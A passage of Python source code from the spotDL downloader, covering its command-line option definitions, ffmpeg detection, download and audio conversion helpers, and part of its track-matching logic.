) # Add config argument parser.add_argument( "--config", action="store_true", help=( "Use the config file to download songs. " "It's located under C:\\Users\\user\\.spotdl\\config.json " "or ~/.spotdl/config.json under linux" ), ) # Add search query argument parser.add_argument( "--search-query", help=f"The search query to use, available variables: {', '.join(VARS)}", type=str, ) # Add don't filter results argument parser.add_argument( "--dont-filter-results", dest="filter_results", action="store_const", const=False, help="Disable filtering results.", ) # Add use only verified results argument parser.add_argument( "--album-type", choices={"album", "single"}, help="Type of the album to search for. (album, single)", type=str, ) # Add use only verified results argument parser.add_argument( "--only-verified-results", action="store_const", const=True, help="Use only verified results. (Not all providers support this)", ) def parse_spotify_options(parser: _ArgumentGroup): """ Parse spotify options from the command line. ### Arguments - parser: The argument parser to add the options to. 
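For illustration, these flags can be exercised through the parser that
`create_parser()` (defined further down in this module) builds; the query
string is a placeholder.

```python
args = create_parser().parse_args(
    ["download", "some search query", "--user-auth", "--no-cache"]
)
print(args.user_auth, args.no_cache)  # True True
```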
""" # Add login argument parser.add_argument( "--user-auth", action="store_const", const=True, help="Login to Spotify using OAuth.", ) # Add client id argument parser.add_argument( "--client-id", help="The client id to use when logging in to Spotify.", type=str, ) # Add client secret argument parser.add_argument( "--client-secret", help="The client secret to use when logging in to Spotify.", type=str, ) # Add auth token argument parser.add_argument( "--auth-token", help="The authorization token to use directly to log in to Spotify.", type=str, ) # Add cache path argument parser.add_argument( "--cache-path", type=str, help="The path where spotipy cache file will be stored.", ) # Add no cache argument parser.add_argument( "--no-cache", action="store_const", const=True, help="Disable caching (both requests and token).", ) # Add max retries argument parser.add_argument( "--max-retries", type=int, help="The maximum number of retries to perform when getting metadata.", ) # Add headless argument parser.add_argument( "--headless", action="store_const", const=True, help="Run in headless mode.", ) # Add use cache file argument parser.add_argument( "--use-cache-file", action="store_const", const=True, help=( "Use the cache file to get metadata. " "It's located under C:\\Users\\user\\.spotdl\\.spotify_cache " "or ~/.spotdl/.spotify_cache under linux. " "It only caches tracks and " "gets updated whenever spotDL gets metadata from Spotify. " "(It may provide outdated metadata use with caution)" ), ) def parse_ffmpeg_options(parser: _ArgumentGroup): """ Parse ffmpeg options from the command line. ### Arguments - parser: The argument parser to add the options to. """ # Add ffmpeg executable argument parser.add_argument( "--ffmpeg", help="The ffmpeg executable to use.", type=str, ) # Add search threads argument parser.add_argument( "--threads", type=int, help="The number of threads to use when downloading songs.", ) # Add constant bit rate argument parser.add_argument( "--bitrate", choices=[ "auto", "disable", "8k", "16k", "24k", "32k", "40k", "48k", "64k", "80k", "96k", "112k", "128k", "160k", "192k", "224k", "256k", "320k", ] + list(map(str, range(0, 10))), type=str.lower, help=( "The constant/variable bitrate to use for the output file. " "Values from 0 to 9 are variable bitrates. " "Auto will use the bitrate of the original file. " "Disable will disable the bitrate option. " "(In case of m4a and opus files, auto and disable will skip the conversion)" ), ) # Additional ffmpeg arguments parser.add_argument( "--ffmpeg-args", type=str, help="Additional ffmpeg arguments passed as a string.", ) def parse_output_options(parser: _ArgumentGroup): """ Parse output options from the command line. ### Arguments - parser: The argument parser to add the options to. """ # Add output format argument parser.add_argument( "--format", choices=FFMPEG_FORMATS.keys(), help="The format to download the song in.", type=str, ) # Add save file argument parser.add_argument( "--save-file", type=str, help=( "The file to save/load the songs data from/to. " "It has to end with .spotdl. " "If combined with the download operation, it will save the songs data to the file. " "Required for save/sync (use - to print to stdout when using save). 
" ), required=len(sys.argv) > 1 and sys.argv[1] in ["save"], ) # Add preload argument parser.add_argument( "--preload", action="store_const", const=True, help="Preload the download url to speed up the download process.", ) # Add name format argument parser.add_argument( "--output", type=str, help=f"Specify the downloaded file name format, available variables: {', '.join(VARS)}", ) # Add m3u argument parser.add_argument( "--m3u", type=str, nargs="?", help=( "Name of the m3u file to save the songs to. " "Defaults to {list[0]}.m3u8 " "If you want to generate a m3u for each list in the query use {list}, " "If you want to generate a m3u file based on the first list in the query use {list[0]}" ", (0 is the first list in the query, 1 is the second, etc. " "songs don't count towards the list number) " ), const="{list[0]}.m3u8", ) # Add cookie file argument parser.add_argument( "--cookie-file", help="Path to cookies file.", type=str, ) # Add overwrite argument parser.add_argument( "--overwrite", choices={"force", "skip", "metadata"}, help=( "How to handle existing/duplicate files. " "(When combined with --scan-for-songs force will remove " "all duplicates, and metadata will only apply metadata to the " "latest song and will remove the rest. )" ), type=str, ) # Option to increase compatibility of filenames and easier handling in the shell parser.add_argument( "--restrict", choices={"strict", "ascii", "none"}, const="strict", nargs="?", help="Restrict filenames to a sanitized set of characters for better compatibility", type=str, ) # Option to print errors on exit, useful for long playlist parser.add_argument( "--print-errors", action="store_const", const=True, help="Print errors (wrong songs, failed downloads etc) on exit, useful for long playlist", ) # Option to save errors to a file parser.add_argument( "--save-errors", type=str, help="Save errors (wrong songs, failed downloads etc) to a file", ) # Option to use sponsor block parser.add_argument( "--sponsor-block", action="store_const", const=True, help="Use the sponsor block to download songs from yt/ytm.", ) # Add archive_file argument parser.add_argument( "--archive", type=str, help="Specify the file name for an archive of already downloaded songs", ) # Option to set the track number & album of tracks in a playlist to their index in the playlist # & the name of playlist respectively. parser.add_argument( "--playlist-numbering", action="store_const", dest="playlist_numbering", const=True, help="Sets each track in a playlist to have the playlist's name as its album,\ and album art as the playlist's icon", ) # Option to scan the output directory for existing files parser.add_argument( "--scan-for-songs", action="store_const", const=True, help=( "Scan the output directory for existing files. " "This option should be combined with the --overwrite option " "to control how existing files are handled. (Output directory is the last directory " "that is not a template variable in the output template)" ), ) # Option to fetch all albums from songs in query parser.add_argument( "--fetch-albums", action="store_const", const=True, help="Fetch all albums from songs in query", ) # Option to change the id3 separator parser.add_argument( "--id3-separator", type=str, help="Change the separator used in the id3 tags. 
Only supported for mp3 files.", ) # Option to use ytm data instead of spotify data # when downloading using ytm link parser.add_argument( "--ytm-data", action="store_const", const=True, help="Use ytm data instead of spotify data when downloading using ytm link.", ) # Option whether to add unavailable songs to the m3u file parser.add_argument( "--add-unavailable", action="store_const", const=True, help="Add unavailable songs to the m3u/archive files when downloading", ) # Generate lrc files parser.add_argument( "--generate-lrc", action="store_const", const=True, help=( "Generate lrc files for downloaded songs. " "Requires `synced` provider to be present in the lyrics providers list." ), ) # Force update metadata parser.add_argument( "--force-update-metadata", action="store_const", const=True, help="Force update metadata for songs that already have metadata.", ) # Sync without deleting parser.add_argument( "--sync-without-deleting", action="store_const", const=True, help="Sync without deleting songs that are not in the query.", ) # Max file name length parser.add_argument( "--max-filename-length", type=int, help=( "Max file name length. " "(This won't override the max file name length enforced by the OS)" ), ) # YT-DlP options parser.add_argument( "--yt-dlp-args", type=str, help="Arguments to pass to yt-dlp", ) # Detect formats option parser.add_argument( "--detect-formats", type=str, nargs="*", help=( "Detect already downloaded songs with file format different from the --format option " "(When combined with --m3u option, " "only first detected format will be added to m3u file)" ), choices=FFMPEG_FORMATS.keys(), ) # download song in meta operation parser.add_argument( "--redownload", action="store_const", const=True, help="to redownload the local song in diffrent format using --format for meta operation", ) # skip album art for meta operation parser.add_argument( "--skip-album-art", action="store_const", const=True, help="skip downloading album art for meta operation", ) # Ignore songs from a paticular album parser.add_argument( "--ignore-albums", type=str, nargs="*", help="ignores the song of the given albums", ) # Skip explicit songs options parser.add_argument( "--skip-explicit", action="store_const", const=True, help="Skip explicit songs" ) parser.add_argument( "--proxy", help="Http(s) proxy server for download song. Example: http://host:port", ) # Skip songs having a skip flag file parser.add_argument( "--create-skip-file", action="store_const", const=True, help="Create skip file for successfully downloaded file", ) # Skip songs having a skip flag file parser.add_argument( "--respect-skip-file", action="store_const", const=True, help="If a file with the extension .skip exists, skip download", ) # Sync remove lrc files parser.add_argument( "--sync-remove-lrc", action="store_const", const=True, help="Remove lrc files when using sync operation when downloading songs", ) def parse_web_options(parser: _ArgumentGroup): """ Parse web options from the command line. ### Arguments - parser: The argument parser to add the options to. 
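When none of these flags are given, the values fall back to `WEB_OPTIONS` in
`spotdl.utils.config`, for example:

```python
>>> from spotdl.utils.config import WEB_OPTIONS
>>> WEB_OPTIONS["host"], WEB_OPTIONS["port"], WEB_OPTIONS["keep_alive"]
('localhost', 8800, False)
```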
""" # Add host argument parser.add_argument( "--host", type=str, help="The host to use for the web server.", ) # Add port argument parser.add_argument( "--port", type=int, help="The port to run the web server on.", ) # Add keep alive argument parser.add_argument( "--keep-alive", action="store_const", const=True, help="Keep the web server alive even when no clients are connected.", ) # Add allowed origins argument parser.add_argument( "--allowed-origins", nargs="*", help="The allowed origins for the web server.", ) # Add use output directory argument parser.add_argument( "--web-use-output-dir", action="store_const", const=True, help=( "Use the output directory instead of the session directory for downloads. (" "This might cause issues if you have multiple users using the web-ui at the same time)" ), ) # Add keep sessions argument parser.add_argument( "--keep-sessions", action="store_const", const=True, help="Keep the session directory after the web server is closed.", ) # Add keep sessions argument parser.add_argument( "--force-update-gui", action="store_const", const=True, default=False, help="Refresh the web server directory with a fresh git checkout", ) # Add custom web gui repo parser.add_argument( "--web-gui-repo", type=str, help=( "Custom web gui repo to use for the web server. " "Example: https://github.com/spotdl/web-ui/tree/master/dist" ), ) # Add custom web gui repo parser.add_argument( "--web-gui-location", type=str, help="Path to the web gui directory to use for the web server.", ) # Enable TLS for the web server parser.add_argument( "--enable-tls", action="store_const", const=True, help="Enable TLS on the web server.", ) # Add File Location of the TLS Certificate file (Pem Format) parser.add_argument( "--cert-file", type=str, help="File Path to the TLS Certificate (PEM format)." ) # Add File Location of the TLS Private Key file (Pem Format) parser.add_argument( "--key-file", type=str, help="File Path to the TLS Private Key (PEM format)." ) # Add File Location of the TLS Certificate Authority file (Pem Format) parser.add_argument( "--ca-file", type=str, help="File Path to the TLS Certificate Authority File (PEM format).", ) def parse_misc_options(parser: _ArgumentGroup): """ Parse misc options from the command line. ### Arguments - parser: The argument parser to add the options to. """ # Add verbose argument parser.add_argument( "--log-level", choices=NAME_TO_LEVEL.keys(), help="Select log level.", ) # Add simple tui argument parser.add_argument( "--simple-tui", action="store_const", const=True, help="Use a simple tui.", ) # Add log format argument parser.add_argument( "--log-format", help=( "Custom logging format to use. More info: " "https://docs.python.org/3/library/logging.html#logrecord-attributes" ), ) def parse_other_options(parser: _ArgumentGroup): """ Parse other options from the command line. ### Arguments - parser: The argument parser to add the options to. """ parser.add_argument( "--download-ffmpeg", action="store_true", help="Download ffmpeg to spotdl directory.", ) parser.add_argument( "--generate-config", action="store_true", help="Generate a config file. This will overwrite current config if present.", ) parser.add_argument( "--check-for-updates", action="store_true", help="Check for new version." ) parser.add_argument( "--profile", action="store_true", help="Run in profile mode. 
Useful for debugging.", ) parser.add_argument( "--version", "-v", action="version", help="Show the version number and exit.", version=_version.__version__, ) def create_parser() -> ArgumentParser: """ Parse arguments from the command line. ### Returns - A Namespace object containing the parsed arguments. """ # Initialize argument parser parser = ArgumentParser( prog="spotdl", description="Download your Spotify playlists and songs along with album art and metadata", formatter_class=SmartFormatter, epilog=( "For more information, visit http://spotdl.rtfd.io/ " "or join our Discord server: https://discord.com/invite/xCa23pwJWY" ), ) # Parse main options main_options = parser.add_argument_group("Main options") parse_main_options(main_options) # Parse spotify options spotify_options = parser.add_argument_group("Spotify options") parse_spotify_options(spotify_options) # Parse ffmpeg options ffmpeg_options = parser.add_argument_group("FFmpeg options") parse_ffmpeg_options(ffmpeg_options) # Parse output options output_options = parser.add_argument_group("Output options") parse_output_options(output_options) # Parse web options web_options = parser.add_argument_group("Web options") parse_web_options(web_options) # Parse misc options misc_options = parser.add_argument_group("Misc options") parse_misc_options(misc_options) # Parse other options other_options = parser.add_argument_group("Other options") parse_other_options(other_options) return parser def parse_arguments() -> Namespace: """ Parse arguments from the command line. ### Arguments - parser: The argument parser to parse the arguments from. ### Returns - A Namespace object containing the parsed arguments. """ # Create parser parser = create_parser() # Parse arguments return parser.parse_args() File: spotdl/utils/ffmpeg.py """ Module for converting audio files to different formats and checking for ffmpeg binary, and downloading it if not found. 
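A minimal conversion sketch, assuming an ffmpeg binary is already available;
the file names and bitrate are placeholders.

```python
from pathlib import Path

from spotdl.utils.ffmpeg import convert

ok, error = convert(
    input_file=Path("track.webm"),
    output_file=Path("track.mp3"),
    output_format="mp3",
    bitrate="192k",
    progress_handler=lambda percent: print(f"{percent}%"),
)
if not ok:
    print(error)
```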
""" import os import platform import re import shlex import shutil import stat import subprocess from pathlib import Path from typing import Any, Callable, Dict, List, Optional, Tuple, Union import requests from spotdl.utils.config import get_spotdl_path from spotdl.utils.formatter import to_ms __all__ = [ "FFMPEG_URLS", "FFMPEG_FORMATS", "DUR_REGEX", "TIME_REGEX", "VERSION_REGEX", "YEAR_REGEX", "FFmpegError", "is_ffmpeg_installed", "get_ffmpeg_path", "get_ffmpeg_version", "get_local_ffmpeg", "download_ffmpeg", "convert", ] FFMPEG_URLS = { "windows": { "amd64": "https://github.com/eugeneware/ffmpeg-static/releases/download/b4.4/win32-x64", "i686": "https://github.com/eugeneware/ffmpeg-static/releases/download/b4.4/win32-ia32", }, "linux": { "x86_64": "https://github.com/eugeneware/ffmpeg-static/releases/download/b4.4/linux-x64", "x86": "https://github.com/eugeneware/ffmpeg-static/releases/download/b4.4/linux-ia32", "arm32": "https://github.com/eugeneware/ffmpeg-static/releases/download/b4.4/linux-arm", "aarch64": "https://github.com/eugeneware/ffmpeg-static/releases/download/b4.4/linux-arm64", }, "darwin": { "x86_64": "https://github.com/eugeneware/ffmpeg-static/releases/download/b4.4/darwin-x64", "arm64": "https://github.com/eugeneware/ffmpeg-static/releases/download/b4.4/darwin-arm64", }, } FFMPEG_FORMATS = { "mp3": ["-codec:a", "libmp3lame"], "flac": ["-codec:a", "flac", "-sample_fmt", "s16"], "ogg": ["-codec:a", "libvorbis"], "opus": ["-codec:a", "libopus"], "m4a": ["-codec:a", "aac"], "wav": ["-codec:a", "pcm_s16le"], } DUR_REGEX = re.compile( r"Duration: (?P<hour>\d{2}):(?P<min>\d{2}):(?P<sec>\d{2})\.(?P<ms>\d{2})" ) TIME_REGEX = re.compile( r"out_time=(?P<hour>\d{2}):(?P<min>\d{2}):(?P<sec>\d{2})\.(?P<ms>\d{2})" ) VERSION_REGEX = re.compile(r"ffmpeg version \w?(\d+\.)?(\d+)") YEAR_REGEX = re.compile(r"Copyright \(c\) \d\d\d\d\-\d\d\d\d") class FFmpegError(Exception): """ Base class for all exceptions related to FFmpeg. """ def is_ffmpeg_installed(ffmpeg: str = "ffmpeg") -> bool: """ Check if ffmpeg is installed. ### Arguments - ffmpeg: ffmpeg executable to check ### Returns - True if ffmpeg is installed, False otherwise. """ if ffmpeg == "ffmpeg": global_ffmpeg = shutil.which("ffmpeg") if global_ffmpeg is None: ffmpeg_path = get_ffmpeg_path() else: ffmpeg_path = Path(global_ffmpeg) else: ffmpeg_path = Path(ffmpeg) if ffmpeg_path is None: return False # else check if path to ffmpeg is valid # and if ffmpeg has the correct access rights return ffmpeg_path.exists() and os.access(ffmpeg_path, os.X_OK) def get_ffmpeg_path() -> Optional[Path]: """ Get path to global ffmpeg binary or a local ffmpeg binary. ### Returns - Path to ffmpeg binary or None if not found. """ # Check if ffmpeg is installed global_ffmpeg = shutil.which("ffmpeg") if global_ffmpeg: return Path(global_ffmpeg) # Get local ffmpeg path return get_local_ffmpeg() def get_ffmpeg_version(ffmpeg: str = "ffmpeg") -> Tuple[Optional[float], Optional[int]]: """ Get ffmpeg version. ### Arguments - ffmpeg: ffmpeg executable to check ### Returns - Tuple of optional version and optional year. ### Errors - FFmpegError if ffmpeg is not installed. - FFmpegError if ffmpeg version is not found. 
""" # Check if ffmpeg is installed if not is_ffmpeg_installed(ffmpeg): if ffmpeg == "ffmpeg": raise FFmpegError("ffmpeg is not installed.") raise FFmpegError(f"{ffmpeg} is not a valid ffmpeg executable.") with subprocess.Popen( [ffmpeg, "-version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8", ) as process: output = "".join(process.communicate()) # Search for version and build year in output version_result = VERSION_REGEX.search(output) year_result = YEAR_REGEX.search(output) build_year = None version = None if version_result is not None: # remove all non numeric characters from string example: n4.3 version_str = re.sub(r"[a-zA-Z]", "", version_result.group(0)) # parse version string to float version = float(version_str) if version_str else None if year_result is not None: # get build years from string example: Copyright (c) 2019-2020 build_years = [ int( re.sub(r"[^0-9]", "", year) ) # remove all non numeric characters from string for year in year_result.group(0).split( "-" ) # split string into list of years ] # get the highest build year build_year = max(build_years) return (version, build_year) def get_local_ffmpeg() -> Optional[Path]: """ Get local ffmpeg binary path. ### Returns - Path to ffmpeg binary or None if not found. """ ffmpeg_path = Path(get_spotdl_path()) / ( "ffmpeg" + (".exe" if platform.system() == "Windows" else "") ) if ffmpeg_path.is_file(): return ffmpeg_path return None def download_ffmpeg() -> Path: """ Download ffmpeg binary to spotdl directory. ### Returns - Path to ffmpeg binary. ### Notes - ffmpeg is downloaded from github releases for current platform and architecture. - executable permission is set for ffmpeg binary. """ os_name = platform.system().lower() os_arch = platform.machine().lower() ffmpeg_url: Optional[str] = None # if platform.system() == "Darwin" and ( # platform.processor() == "arm" # or subprocess.run(["sysctl", "-n", "sysctl.proc_translated"], check=False) # ): # ffmpeg_url = FFMPEG_URLS["darwin"]["arm"] # else: # ffmpeg_url = FFMPEG_URLS.get(os_name, {}).get(os_arch) ffmpeg_url = FFMPEG_URLS.get(os_name, {}).get(os_arch) if ffmpeg_url is None: raise FFmpegError("FFmpeg binary is not available for your system.") ffmpeg_path = Path( os.path.join( get_spotdl_path(), "ffmpeg" + (".exe" if os_name == "windows" else "") ) ) # Download binary and save it to a file in spotdl directory ffmpeg_binary = requests.get(ffmpeg_url, allow_redirects=True, timeout=10).content with open(ffmpeg_path, "wb") as ffmpeg_file: ffmpeg_file.write(ffmpeg_binary) # Set executable permission on linux and mac if os_name in ["linux", "darwin"]: ffmpeg_path.chmod(ffmpeg_path.stat().st_mode | stat.S_IEXEC) return ffmpeg_path def convert( input_file: Union[Path, Tuple[str, str]], output_file: Path, ffmpeg: str = "ffmpeg", output_format: str = "mp3", bitrate: Optional[str] = None, ffmpeg_args: Optional[str] = None, progress_handler: Optional[Callable[[int], None]] = None, ) -> Tuple[bool, Optional[Dict[str, Any]]]: """ Convert the input file to the output file synchronously with progress handler. ### Arguments - input_file: Path to input file or tuple of (url, file_format). - output_file: Path to output file. - ffmpeg: ffmpeg executable to use. - output_format: output format. - bitrate: constant/variable bitrate. - ffmpeg_args: ffmpeg arguments. - progress_handler: progress handler, has to accept an integer as argument. ### Returns - Tuple of conversion status and error dictionary. 
### Notes - Make sure to check if ffmpeg is installed before calling this function. """ # Initialize ffmpeg command # -i is the input file arguments: List[str] = [ "-nostdin", "-y", "-i", str(input_file.resolve()) if isinstance(input_file, Path) else input_file[0], "-movflags", "+faststart", "-v", "debug", "-progress", "-", "-nostats", ] file_format = ( str(input_file.suffix).split(".")[1] if isinstance(input_file, Path) else input_file[1] ) # Add output format to command # -c:a is used if the file is not an matroska container # and we want to convert to opus # otherwise we use arguments from FFMPEG_FORMATS if output_format == "opus" and file_format != "webm": arguments.extend(["-c:a", "libopus"]) else: if ( (output_format == "opus" and file_format == "webm") or (output_format == "m4a" and file_format == "m4a") and not (bitrate or ffmpeg_args) ): # Copy the audio stream to the output file arguments.extend(["-vn", "-c:a", "copy"]) else: arguments.extend(FFMPEG_FORMATS[output_format]) # Add bitrate if specified if bitrate: # Check if bitrate is an integer # if it is then use it as variable bitrate if bitrate.isdigit(): arguments.extend(["-q:a", bitrate]) else: arguments.extend(["-b:a", bitrate]) # Add other ffmpeg arguments if specified if ffmpeg_args: arguments.extend(shlex.split(ffmpeg_args)) # Add output file at the end arguments.append(str(output_file.resolve())) # Run ffmpeg with subprocess.Popen( [ffmpeg, *arguments], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=False, ) as process: if not progress_handler: # Wait for process to finish proc_out = process.communicate() if process.returncode != 0: # get version and build year version = get_ffmpeg_version(ffmpeg) # join stdout and stderr and decode to utf-8 message = b"".join([out for out in proc_out if out]).decode("utf-8") # return error dictionary return False, { "return_code": process.returncode, "arguments": arguments, "ffmpeg": ffmpeg, "version": version[0], "build_year": version[1], "error": message, } return True, None progress_handler(0) out_buffer = [] total_dur = None while True: if process.stdout is None: continue out_line = ( process.stdout.readline().decode("utf-8", errors="replace").strip() ) if out_line == "" and process.poll() is not None: break out_buffer.append(out_line.strip()) total_dur_match = DUR_REGEX.search(out_line) if total_dur is None and total_dur_match: total_dur = to_ms(**total_dur_match.groupdict()) # type: ignore continue if total_dur: progress_time = TIME_REGEX.search(out_line) if progress_time: elapsed_time = to_ms(**progress_time.groupdict()) # type: ignore progress_handler(int(elapsed_time / total_dur * 100)) # type: ignore if process.returncode != 0: # get version and build year version = get_ffmpeg_version(ffmpeg) return False, { "return_code": process.returncode, "arguments": arguments, "ffmpeg": ffmpeg, "version": version[0], "build_year": version[1], "error": "\n".join(out_buffer), } progress_handler(100) return True, None File: spotdl/utils/__init__.py """ Utility functions for spotdl. These functions are used in every stage of the download process. 
""" File: spotdl/utils/matching.py """ Module for all things matching related """ import logging from itertools import product, zip_longest from math import exp from typing import Dict, List, Optional, Tuple from spotdl.types.result import Result from spotdl.types.song import Song from spotdl.utils.formatter import ( create_search_query, create_song_title, ratio, slugify, ) from spotdl.utils.logging import MATCH __all__ = [ "FORBIDDEN_WORDS", "fill_string", "create_clean_string", "sort_string", "based_sort", "check_common_word", "check_forbidden_words", "create_match_strings", "get_best_matches", "calc_main_artist_match", "calc_artists_match", "artists_match_fixup1", "artists_match_fixup2", "artists_match_fixup3", "calc_name_match", "calc_time_match", "calc_album_match", ] logger = logging.getLogger(__name__) FORBIDDEN_WORDS = [ "bassboosted", "remix", "remastered", "remaster", "reverb", "bassboost", "live", "acoustic", "8daudio", "concert", "live", "acapella", "slowed", "instrumental", "remix", "cover", "reverb", ] def debug(song_id: str, result_id: str, message: str) -> None: """ Log a message with MATCH level ### Arguments - message: message to log """ logger.log(MATCH, "[%s|%s] %s", song_id, result_id, message) def fill_string(strings: List[str], main_string: str, string_to_check: str) -> str: """ Create a string with strings from `strings` list if they are not yet present in main_string but are present in string_to_check ### Arguments - strings: strings to check - main_string: string to add strings to - string_to_check: string to check if strings are present in ### Returns - string with strings from `strings` list """ final_str = main_string test_str = final_str.replace("-", "") simple_test_str = string_to_check.replace("-", "") for string in strings: slug_str = slugify(string).replace("-", "") if slug_str in simple_test_str and slug_str not in test_str: final_str += f"-{slug_str}" test_str += slug_str return final_str def create_clean_string( words: List[str], string: str, sort: bool = False, join_str: str = "-" ) -> str: """ Create a string with strings from `words` list if they are not yet present in `string` ### Arguments - words: strings to check - string: string to check if strings are present in - sort: sort strings in list - join_str: string to join strings with ### Returns - string with strings from `words` list """ string = slugify(string).replace("-", "") final = [] for word in words: word = slugify(word).replace("-", "") if word in string: continue final.append(word) if sort: return sort_string(final, join_str) return f"{join_str}".join(final) def sort_string(strings: List[str], join_str: str) -> str: """ Sort strings in list and join them with `join` string ### Arguments - strings: strings to sort - join: string to join strings with ### Returns - joined sorted string """ final_str = strings final_str.sort() return f"{join_str}".join(final_str) def based_sort(strings: List[str], based_on: List[str]) -> Tuple[List[str], List[str]]: """ Sort strings in list based on the order of strings in `based_on` list ### Arguments - strings: strings to sort - based_on: strings to sort `strings` list based on ### Returns - sorted list of strings """ strings.sort() based_on.sort() list_map = {value: index for index, value in enumerate(based_on)} strings = sorted( strings, key=lambda x: list_map.get(x, -1), reverse=True, ) based_on.reverse() return strings, based_on def check_common_word(song: Song, result: Result) -> bool: """ Check if a word is present in a sentence ### Arguments - song: 
song to match - result: result to match ### Returns - True if word is present in sentence, False otherwise """ sentence_words = slugify(song.name).split("-") to_check = slugify(result.name).replace("-", "") for word in sentence_words: if word != "" and word in to_check: return True return False def check_forbidden_words(song: Song, result: Result) -> Tuple[bool, List[str]]: """ Check if a forbidden word is present in the result name ### Arguments - song: song to match - result: result to match ### Returns - True if forbidden word is present in result name, False otherwise """ song_name = slugify(song.name).replace("-", "") to_check = slugify(result.name).replace("-", "") words = [] for word in FORBIDDEN_WORDS: if word in to_check and word not in song_name: words.append(word) return len(words) > 0, words def create_match_strings( song: Song, result: Result, search_query: Optional[str] = None ) -> Tuple[str, str]: """ Create strings based on song and result to match fill strings with missing artists ### Arguments - song: song to match - result: result to match ### Returns - tuple of strings to match """ slug_song_name = slugify(song.name) slug_song_title = slugify( create_song_title(song.name, song.artists) if not search_query else create_search_query(song, search_query, False, None, True) ) test_str1 = slugify(result.name) test_str2 = slug_song_name if result.verified else slug_song_title # Fill strings with missing artists test_str1 = fill_string(song.artists, test_str1, test_str2) test_str2 = fill_string(song.artists, test_str2, test_str1) # Sort both strings and then join them test_list1, test_list2 = based_sort(test_str1.split("-"), test_str2.split("-")) test_str1, test_str2 = "-".join(test_list1), "-".join(test_list2) return test_str1, test_str2 def get_best_matches( results: Dict[Result, float], score_threshold: float ) -> List[Tuple[Result, float]]: """ Get best matches from a list of results ### Arguments - results: list of results to match - score_threshold: threshold to match results ### Returns - list of best matches """ result_items = list(results.items()) # Sort results by highest score sorted_results = sorted(result_items, key=lambda x: x[1], reverse=True) best_score = sorted_results[0][1] return [ result for result in sorted_results if (best_score - result[1]) <= score_threshold ] def calc_main_artist_match(song: Song, result: Result) -> float: """ Check if main artist is present in list of artists ### Arguments - main_artist: main artist to check - artists: list of artists to check ### Returns - True if main artist is present in list of artists, False otherwise """ main_artist_match = 0.0 # Result has no artists, return 0.0 if not result.artists: return main_artist_match song_artists, result_artists = list(map(slugify, song.artists)), list( map(slugify, result.artists) ) sorted_song_artists, sorted_result_artists = based_sort( song_artists, result_artists ) debug(song.song_id, result.result_id, f"Song artists: {sorted_song_artists}") debug(song.song_id, result.result_id, f"Result artists: {sorted_result_artists}") slug_song_main_artist = slugify(song.artists[0]) slug_result_main_artist = sorted_result_artists[0] # Result has only one artist, but song has multiple artists # we can assume that other artists are in the main artist name if len(song.artists) > 1 and len(result.artists) == 1: for artist in map(slugify, song.artists[1:]): artist = sort_string(slugify(artist).split("-"), "-") res_main_artist = sort_string(slug_result_main_artist.split("-"), "-") if artist in 
res_main_artist: main_artist_match += 100 / len(song.artists) return main_artist_match # Match main result artist with main song artist main_artist_match = ratio(slug_song_main_artist, slug_result_main_artist) debug( song.song_id, result.result_id, f"First main artist match: {main_artist_match}" ) # Use second artist from the sorted list to # calculate the match if the first artist match is too low if main_artist_match < 50 and len(song_artists) > 1: for song_artist, result_artist in product( song_artists[:2], sorted_result_artists[:2] ): new_artist_match = ratio(song_artist, result_artist) debug( song.song_id, result.result_id, f"Matched {song_artist} with {result_artist}: {new_artist_match}", ) main_artist_match = max(main_artist_match, new_artist_match) return main_artist_match def calc_artists_match(song: Song, result: Result) -> float: """ Check if all artists are present in list of artists ### Arguments - song: song to match - result: result to match ### Returns - artists match percentage """ artist_match_number = 0.0 # Result has only one artist, return 0.0 if len(song.artists) == 1 or not result.artists: return artist_match_number artist1_list, artist2_list = based_sort( list(map(slugify, song.artists)), list(map(slugify, result.artists)) ) # Remove main artist from the lists artist1_list, artist2_list = artist1_list[1:], artist2_list[1:] artists_match = 0.0 for artist1, artist2 in zip_longest(artist1_list, artist2_list): artist12_match = ratio(artist1, artist2) artists_match += artist12_match artist_match_number = artists_match / len(artist1_list) return artist_match_number def artists_match_fixup1(song: Song, result: Result, score: float) -> float: """ Multiple fixes to the artists score for not verified results to improve the accuracy ### Arguments - song: song to match - result: result to match - score: current score ### Returns - new score """ # If we have a verified result, we don't have to fix anything if result.verified or score > 50: return score # If we didn't find any artist match, # we fallback to channel name match channel_name_match = ratio( slugify(song.artist), slugify(", ".join(result.artists)) if result.artists else "", ) score = max(score, channel_name_match) # If artist match is still too low, # we fallback to matching all song artist names # with the result's title if score <= 70: artist_title_match = 0.0 result_name = slugify(result.name).replace("-", "") for artist in song.artists: slug_artist = slugify(artist).replace("-", "") if slug_artist in result_name: artist_title_match += 1.0 artist_title_match = (artist_title_match / len(song.artists)) * 100 score = max(score, artist_title_match) # If artist match is still too low, # we fallback to matching all song artist names # with the result's artists if score <= 70: # Song artists: ['charlie-moncler', 'fukaj', 'mata', 'pedro'] # Result artists: ['fukaj-mata-charlie-moncler-und-pedro'] # For artist_list1 artist_list1 = [] for artist in song.artists: artist_list1.extend(slugify(artist).split("-")) # For artist_list2 artist_list2 = [] if result.artists: for artist in result.artists: artist_list2.extend(slugify(artist).split("-")) artist_tuple1 = tuple(artist_list1) artist_tuple2 = tuple(artist_list2) artist_title_match = ratio(artist_tuple1, artist_tuple2) score = max(score, artist_title_match) return score def artists_match_fixup2( song: Song, result: Result, score: float, search_query: Optional[str] = None ) -> float: """ Multiple fixes to the artists score for verified results to improve the accuracy ### 
Arguments - song: song to match - result: result to match - score: current score ### Returns - new score """ if score > 70 or not result.verified: # Don't fixup the score # if the artist match is already high # or if the result is not verified return score # Slugify some variables slug_song_name = slugify(song.name) slug_result_name = slugify(result.name) # # Check if the main artist is simlar has_main_artist = (score / (2 if len(song.artists) > 1 else 1)) > 50 _, match_str2 = create_match_strings(song, result, search_query) # Check if other song artists are in the result name # if they are, we increase the artist match # (main artist is already checked, so we skip it) artists_to_check = song.artists[int(has_main_artist) :] for artist in artists_to_check: artist = slugify(artist).replace("-", "") if artist in match_str2.replace("-", ""): score += 5 # if the artist match is still too low, # we fallback to matching all song artist names # with the result's artists if score <= 70: # Artists from song/result name without the song/result name words artist_list1 = create_clean_string(song.artists, slug_song_name, True) artist_list2 = create_clean_string( list(result.artists) if result.artists else [result.author], slug_result_name, True, ) artist_title_match = ratio(artist_list1, artist_list2) score = max(score, artist_title_match) return score def artists_match_fixup3(song: Song, result: Result, score: float) -> float: """ Calculate match percentage based result's name and song's title if the result has exactly one artist and the song has more than one artist 